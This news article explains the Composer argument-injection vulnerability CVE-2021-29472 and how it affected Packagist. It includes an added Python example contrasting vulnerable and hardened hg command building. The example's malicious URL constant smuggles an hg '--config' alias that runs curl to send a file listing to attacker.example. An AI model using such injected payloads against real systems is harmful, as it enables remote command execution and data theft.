Vulnerability found in Composer affecting the Packagist PHP repository

A few days ago news broke that a serious vulnerability had been identified in the Composer dependency manager (CVE-2021-29472) that allows arbitrary commands to be executed on the system when processing a package with a specially crafted URL value, the value that determines where the source code is downloaded from.

The problem manifests in the GitDriver, SvnDriver and HgDriver components, which are used with the Git, Subversion and Mercurial version control systems. The vulnerability was fixed in Composer versions 1.10.22 and 2.0.13.

In particular, the default Packagist package repository, which hosts 306,000 PHP packages and serves more than 1.4 billion downloads per month, is especially affected.

In the PHP ecosystem, Composer is the main tool for managing and installing software dependencies. Development teams around the world use it to simplify the update process and to ensure that applications run without problems across all environments and versions.

Testing showed that an attacker who knew about the problem could take control of the Packagist infrastructure and intercept maintainer credentials, or redirect package downloads to a third-party server and arrange the delivery of package variants with malicious changes, substituting a backdoor during dependency installation.

The risk to end users is limited, because the contents of composer.json are usually defined by the user and source links are only passed along when accessing third-party repositories, which are normally trusted. The main impact fell on the Packagist.org repository and the Private Packagist service, which invoke Composer with data received from users. An attacker could run their own code on the Packagist servers by uploading a specially crafted package.

The Packagist team fixed the vulnerability within 12 hours of being notified. The researchers privately notified the Packagist developers on April 22, and the issue was fixed that same day. The public Composer update containing the fix was released on April 27, and the details were disclosed on April 28. Analysis of the logs on the Packagist servers did not reveal any suspicious activity related to the problem.

Argument injection vulnerabilities are an interesting class of bugs that are often overlooked during code review and missed entirely in black-box engagements.

The problem is caused by an error in the URL validation code, both for the root composer.json file and for source download links. The bug had been present in the code since November 2011. Composer uses special wrappers so that it can handle source downloads without being tied to a particular version control system; these are executed by calling "fromShellCommandline" with a command line built from the arguments.

The heart of the problem is that the ProcessExecutor code path allowed any additional parameters to be smuggled in through the URL, because escaping was missing from the GitDriver.php, SvnDriver.php and HgDriver.php drivers. The attack on GitDriver.php was hindered by the fact that the "git ls-remote" command does not accept additional arguments after the path.

The attack on HgDriver.php was possible by passing the "--config" parameter to the "hg" utility, which allows arbitrary command execution by changing the "alias.identify" setting so that "hg identify" runs a shell command instead.
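To make the mechanism concrete, the following Python example, added here and not taken from Composer or from the researchers' write-up, models the pre-fix pattern (a URL interpolated unescaped into a shell command line) next to a hardened builder, together with a small simulation of how hg treats `--config alias.identify=!CMD`. The host names, the accepted scheme list, the regular expression and the `simulate_hg` model are assumptions for illustration; nothing is executed.

```python
"""Added example (not Composer's code): argument injection into `hg identify`
through an attacker-controlled repository URL, and one way to harden the
command construction. Host names and the allowed-scheme list are assumptions."""
from __future__ import annotations

import re
import shlex
from urllib.parse import urlsplit

# Constructed attacker-controlled URL. After shell word-splitting, the tokens
# after the real URL are parsed by hg as options; `alias.identify=!CMD` makes
# `hg identify` run CMD in a shell instead of the built-in command.
MALICIOUS_URL = (
    "https://hg.example/repo --config "
    "'alias.identify=!curl -d \"$(ls)\" http://attacker.example/'"
)

# Schemes this example accepts (assumption; Composer's own set may differ).
ALLOWED_SCHEMES = {"https", "http", "ssh", "file"}
# Characters permitted in a URL by this example; spaces and quotes are not.
URL_CHARS = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def build_vulnerable(url: str) -> list[str]:
    """Pre-fix pattern: the URL is dropped into a shell command line without
    escaping or validation, and the shell then word-splits it."""
    return shlex.split(f"hg identify {url}")


def build_hardened(url: str) -> list[str]:
    """Validate first, build argv as a list (no shell word-splitting), and put
    `--` before the URL so that hg stops parsing options there."""
    if url.startswith("-"):
        raise ValueError("URL must not look like a command-line option")
    if not URL_CHARS.fullmatch(url):
        raise ValueError("URL contains characters that are not valid in a URL")
    scheme = urlsplit(url).scheme
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"unsupported scheme: {scheme!r}")
    return ["hg", "identify", "--", url]


def hardened_rejects(url: str) -> bool:
    """True if build_hardened refuses the URL."""
    try:
        build_hardened(url)
    except ValueError:
        return True
    return False


def simulate_hg(argv: list[str]) -> tuple[str, str | None]:
    """Minimal model of hg's argument handling for this case. Returns
    ('shell', CMD) when `--config alias.identify=!CMD` would replace the
    identify command, otherwise ('identify', target). Runs nothing."""
    if argv[:2] != ["hg", "identify"]:
        raise ValueError("expected an `hg identify` command line")
    args = argv[2:]
    target = None
    options_done = False
    i = 0
    while i < len(args):
        arg = args[i]
        if not options_done and arg == "--":
            options_done = True
        elif not options_done and (arg == "--config" or arg.startswith("--config=")):
            if arg == "--config":
                i += 1
                if i >= len(args):
                    raise ValueError("--config requires a value")
                value = args[i]
            else:
                value = arg[len("--config="):]
            key, _, val = value.partition("=")
            if key == "alias.identify" and val.startswith("!"):
                return ("shell", val[1:])
        else:
            target = arg
        i += 1
    return ("identify", target)


if __name__ == "__main__":
    print(simulate_hg(build_vulnerable(MALICIOUS_URL)))
    print("hardened rejects malicious URL:", hardened_rejects(MALICIOUS_URL))
    print(simulate_hg(build_hardened("https://hg.example/repo")))
```

Escaping the URL alone would not have been enough here: a single argument such as `--config=alias.identify=!id` is still parsed as an option, which is why the hardened builder both refuses anything starting with `-` and places `--` before the URL.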

By submitting a test package with such a URL to Packagist, the researchers confirmed that, after it was published, their server received an HTTP request from one of the Packagist servers on AWS containing a listing of the files in the current directory.

It should be noted that the maintainers found no signs that this issue had ever been exploited on the public Packagist instance.

Finally, if you are interested in learning more about it, you can check the details at the following link.
